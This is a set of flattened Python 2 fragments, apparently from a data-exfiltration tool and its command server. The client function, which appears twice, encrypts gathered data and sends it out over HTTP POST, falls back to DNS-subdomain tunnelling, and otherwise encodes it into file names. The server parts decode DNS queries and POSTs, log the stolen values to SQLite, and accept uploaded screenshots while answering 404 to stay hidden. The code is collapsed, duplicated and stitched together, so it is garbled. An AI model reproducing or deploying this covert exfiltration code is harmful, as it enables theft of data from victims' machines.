def send_data(result, target, key, host, network_avail, dns_avail): # if network_avail: encrypted = translateMessage(result, key, 'encrypt') data = urlencode({'d': encrypted, 's': host}) try: u = urllib2.urlopen('http://' + target + url_end, data) u.request('POST', url_end, data) except: pass elif dns_avail: # dns data iter = result.split('|') for i in iter: try: regex = re.compile(r"\W+") name = regex.sub("-", i) if len(name) > 1: rec_split(name, key, host, target, subdomain) except: pass else: iter = result.split('|') for i in iter: try: regex = re.compile(r"\W+") name = regex.sub("-", i) open(translateMessage(name, key, 'encrypt'), 'a').close() except: pass
def send_data(result, target, key, host, network_avail, dns_avail): # if network_avail: encrypted = translateMessage(result, key, 'encrypt') data = urlencode({'d':encrypted, 's':host}) try: u = urllib2.urlopen('http://' + target + url_end, data) u.request('POST', url_end, data) except: pass elif dns_avail: # dns data iter = result.split('|') for i in iter: try: regex = re.compile(r"\W+") name = regex.sub("-", i) if len(name) > 1: rec_split(name, key, host, target,subdomain) except: pass else: iter = result.split('|') for i in iter: try: regex = re.compile(r"\W+") name = regex.sub("-", i) open(translateMessage(name, key, 'encrypt'), 'a').close() except: pass
#else: # udps.bind(('',53)) while 1: try: data, addr = udps.recvfrom(1024) p=DNSQuery(data) if p.domain.find(target) > -1 : udps.sendto(p.response(ip), addr) print 'Response: %s -> %s' % (p.domain, ip) fullinfo, domain = p.domain.split(target) print (fullinfo) fullinfo = fullinfo.replace("'","") info, session,temp, temp2 = fullinfo.split('.') decrypted = translateMessage(info,key,'decrypt') type, value = decrypted.split('-',1) print (type,value) type = type.upper() con = sqlite3.connect(dbfile) cur = con.cursor() try: cur.execute("INSERT INTO data (sessionid, type, value, requestdate, ip) VALUES(?,?,?,?,?)", (session,type.upper(),value,str(datetime.datetime.utcnow()), str(addr[0]))) con.commit() except sqlite3.IntegrityError: print("Ierr") if con: try: con.close() except:
def do_POST(self): if None != re.search( url_end +'*', self.path): ip = self.client_address[0] length = int(self.headers['Content-Length']) post_data = urlparse.parse_qs(self.rfile.read(length).decode('utf-8')) session = "" info = "" for key1, value in post_data.iteritems(): if key1 == 'd': #print(value) decrypted = translateMessage(value[0],key,'decrypt') info_array = decrypted.split('|') if key1 == 's': #print(value) session = value[0] for info in info_array: type='' value2='' try: if len(info)>3: type, value2 = info.split(' ',1) regex = re.compile(r"\W+") value = regex.sub("-",value2.strip()) print (type,value) except: with open(logfile, "a") as myfile: traceback.print_exc(file=myfile) myfile.write("Info: " + info) traceback.print_exc() print("info: " + info) continue try: con = sqlite3.connect(dbfile) except OperationalError: with open(logfile, "a") as myfile: traceback.print_exc(file=myfile) time.sleep(1) con = sqlite3.connect(dbfile) cur = con.cursor() try: if len(value)>0: cur.execute("INSERT INTO data (sessionid, type, value, requestdate, ip) VALUES(?,?,?,?,?)", (session,type.upper(),value,str(datetime.datetime.utcnow()), str(ip))) except sqlite3.IntegrityError: con.close() continue con.commit() if con: con.close() try: os.chdir(work_dir) except: pass return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self) if None != re.search(url_screenshot_end + '*', self.path): try: try: os.chdir(work_dir) except: pass #os.chdir('..') ctype, pdict = cgi.parse_header(self.headers.getheader('content-type')) if ctype == 'multipart/form-data' : # using cgi.FieldStorage instead, see # http://stackoverflow.com/questions/1417918/time-out-error-while-creating-cgi-fieldstorage-object fs = cgi.FieldStorage( fp = self.rfile, headers = self.headers, # headers_, environ={ 'REQUEST_METHOD':'POST' } # all the rest will come from the 'headers' object, # but as the FieldStorage object was designed for CGI, absense of 'POST' value in environ # will prevent the object from using the 'fp' argument ! ) ## print 'have fs' #pprint(fs) else: raise Exception("Unexpected POST request") fs_up = fs.list[0] fullname = os.path.join(CWD, fs_up.filename) try: if not os.path.exists(fullname): with open(fullname, 'wb') as o: # self.copyfile(fs['upfile'].file, o) o.write( fs_up.file.read() ) except: pass self.send_response(404) self.end_headers() except Exception as e: # pass with open(logfile, "a") as myfile: traceback.print_exc(file=myfile) traceback.print_exc() self.send_error(404,'POST to "%s" failed: %s' % (self.path, str(e)) )